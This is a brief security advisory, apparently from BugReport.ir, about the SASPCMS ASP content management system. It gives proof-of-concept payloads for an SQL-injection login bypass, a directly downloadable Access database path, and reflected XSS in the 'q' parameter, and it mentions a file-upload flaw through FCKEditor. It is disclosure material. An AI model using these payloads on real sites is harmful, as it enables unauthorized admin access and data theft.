##########################www.BugReport.ir########################################
###################################################################################
####################
SASPCMS is an ASP Content Management System . SASPCMS witch uses MSSQL
& Microsoft Access as backend database.
####################
±->Authentication Bypass
POC: ' or ''='
http://[URL]/saspcms/admin/default.asp
±->Database Information Disclosure
POC: http://[URL]/saspcms/db/menu.mdb
±->Cross Site Scripting (XSS). Reflected XSS attack in "default.asp"
in "q" parameter.
POC:
http://[URL]/saspcms/default.asp?q=<script>alert(document.cookie)</script>
####################
It's possible for remote attackers to upload arbitrary files by using
FCKEditor after login to admin area.
http://www.bugreport.ir/64/exploit.htm
####################
Edit the source code to ensure that inputs are properly sanitized.
####################